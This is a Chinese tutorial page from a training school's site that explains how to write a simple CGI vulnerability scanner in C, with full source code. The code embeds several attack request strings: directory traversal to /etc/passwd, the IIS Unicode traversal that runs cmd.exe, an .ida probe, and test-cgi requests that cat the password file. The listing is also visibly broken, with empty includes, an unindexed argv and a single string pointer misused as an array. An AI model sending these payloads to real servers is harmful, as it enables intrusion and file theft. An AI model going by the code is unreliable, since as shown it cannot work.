网站主页   操作系统    网络工程    服务器    网页制作    数据库    程序开发    网络安全    办公软件   
讲座日期: 本周六下午1点30分 抢座
讲座地点: 北大青鸟马甸校区
主讲老师: 王老师 金牌讲师
讲座主题: 网络安全
讲座内容: 检测、防御、黑客信息,如何过滤不安全的网站,如何防御黑客的进攻。
订座电话: 010-82011432/33
  您当前位置:主页 > 网络学院 > 程序开发 > C++/C教程 >

编写漏洞扫描器




一、漏洞扫描器基本原理:

编写漏洞扫描器探查远程服务器上可能存在的具有安全隐患的文件是否存在,它的 socket 建立过程和上面的端口扫描器是相同的,所不同的是漏洞扫描器通常使用 80 端口,然后对这个端口发送一个 GET 文件的请求,服务器接收到请求会返回文件内容,如果文件不存在则返回一个错误提示,通过接收返回内容可以判断文件是否存在。发送和接收数据需要使用函数 send() 和 recv(),另外对流中存在的字符串进行判断需要使用函数 strstr(),这除了需要具备 socket 函数库的知识以外,还需要一些有关 string 函数库的知识。

二、简单的漏洞扫描源代码:

/********************************************/
/* 端口扫描器 源代码 */
/* CgiScanner.cpp */
/********************************************/

#include
#include
#include

int main(int argc,char *argv[])
{
if(argc!=2){
printf("Useage : scan [IP address]\n");
return(1);
}

struct sockaddr_in blah;
struct hostent *he;
WSADATA wsaData;
int i;
WORD wVersionRequested;
SOCKET sock;

char buff[1024];
char *ex;
ex="GET /../../../../etc/passwd HTTP/1.0\n\n";
ex="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
ex="GET /A.ida/%c1%00.ida HTTP/1.0\n\n";
ex="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n";
ex="GET /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n";
ex="GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";
char *fmsg="HTTP/1.1 200 OK";

wVersionRequested = MAKEWORD( 1, 1 );
if (WSAStartup(wVersionRequested , &wsaData)){
printf("Winsock Initialization failed.\n");
exit(1);
}

if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
printf("Can not create socket.\n");
exit(1);
}
sock = socket(AF_INET,SOCK_STREAM,0);
blah.sin_family = AF_INET;
blah.sin_port = htons(80);
blah.sin_addr.s_addr= inet_addr(argv);

if ((he=gethostbyname(argv))!=NULL){
memcpy((char *)&blah.sin_addr.s_addr,he->h_addr,he->h_length);
}
else{
if((blah.sin_addr.s_addr=inet_addr(argv))==-1){
WSACleanup();
exit(1);
}
}

for (i=1 ; i<7; i++) {
if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){
send(sock,ex[i],strlen(ex[i]),0);
recv(sock,buff,sizeof(buff),0);
if(strstr(buff,fmsg)!=NULL){
printf("\nFound :%s\n", ex[i]);
}
}

closesocket(sock);
WSACleanup();
return(1);
}
}

这段代码可以检测六个漏洞,读者可以根据自己的需要增加漏洞扫描的数量。程序实现的很简洁,概括起来这段程序完成了一下四项工作:

1、连接目标主机 SERVER;
2、向目标主机发送 GET 请求;
3、接收目标返回数据;
4、根据返回数据判断文件是否存在。



摘自:网易社区


Only you!!!


上一篇:Turbo C 在图形状态下快速显示彩色汉字  
下一篇:通用子目录文件显示方法
相关信息:

·虚拟文件系统 ·Oracle应用Linux开发C
·Linux 核心 ·计算机病毒的分类
·Unix(Linux)C编程问题精粹 ·指针与函数的关系
·内核模块的编译文件 ·如何检测Sniffer
·解析C语言中的sizeof ·用C语言小程序来解决大问题

Copyright © 2002-2015 版权所有
学校地址:北京市海淀区西三旗建材城中路29号北大青鸟
招生热线:010-82011433/32 京公网安备110102004704  京ICP备05043413号 京公网安备110102004704